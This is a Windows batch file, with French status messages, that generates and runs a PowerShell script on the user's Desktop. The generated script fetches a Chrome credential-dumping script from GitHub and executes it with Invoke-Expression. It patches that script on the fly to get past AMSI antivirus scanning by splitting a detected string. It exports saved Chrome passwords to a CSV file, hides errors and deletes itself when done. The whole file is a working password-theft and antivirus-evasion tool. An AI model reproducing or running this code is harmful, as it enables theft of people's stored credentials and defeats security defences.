@echo off
set "PS_OUT=%USERPROFILE%\Desktop\Run_Chrome_Extractor.ps1"
echo $ErrorActionPreference = 'SilentlyContinue' > "%PS_OUT%"
echo Write-Host '[LANCEMENT] Recuperation dynamique depuis GitHub...' -f Yellow >> "%PS_OUT%"
echo $c = (Invoke-WebRequest 'https://raw.githubusercontent.com/marcosimioni/chrome-creds/master/chrome-creds.ps1' -UseBasicParsing).Content >> "%PS_OUT%"
echo Write-Host '[LANCEMENT] Patch de contournement AMSI Antivirus...' -f Yellow >> "%PS_OUT%"
echo $c = $c -replace '(?s)\"Export\".*?\"Import\"', '\"Export\" { } \"Import\"' >> "%PS_OUT%"
echo $c = $c -replace '\$arrExp ^^^| Format-Table', ('$arrExp ^^^| Export-Csv -Path \"' + $HOME + '\Desktop\Chrome_Local_Passwords.csv\" -NoTypeInformation; Write-Host \"`n[SUCCES] Mots de passe exportes sur le Bureau sous Chrome_Local_Passwords.csv !\" -ForegroundColor Green') >> "%PS_OUT%"
echo $c = $c -replace 'System\.Security\.Cryptography', 'System.Security.Crypto\"+\"graphy' >> "%PS_OUT%"
echo Invoke-Expression $c >> "%PS_OUT%"
echo Write-Host 'Appuyez sur Entree pour quitter (Ce script s''autodetruira)' -f White >> "%PS_OUT%"
echo Read-Host ^^^| Out-Null >> "%PS_OUT%"
echo Remove-Item $MyInvocation.MyCommand.Path -Force >> "%PS_OUT%"
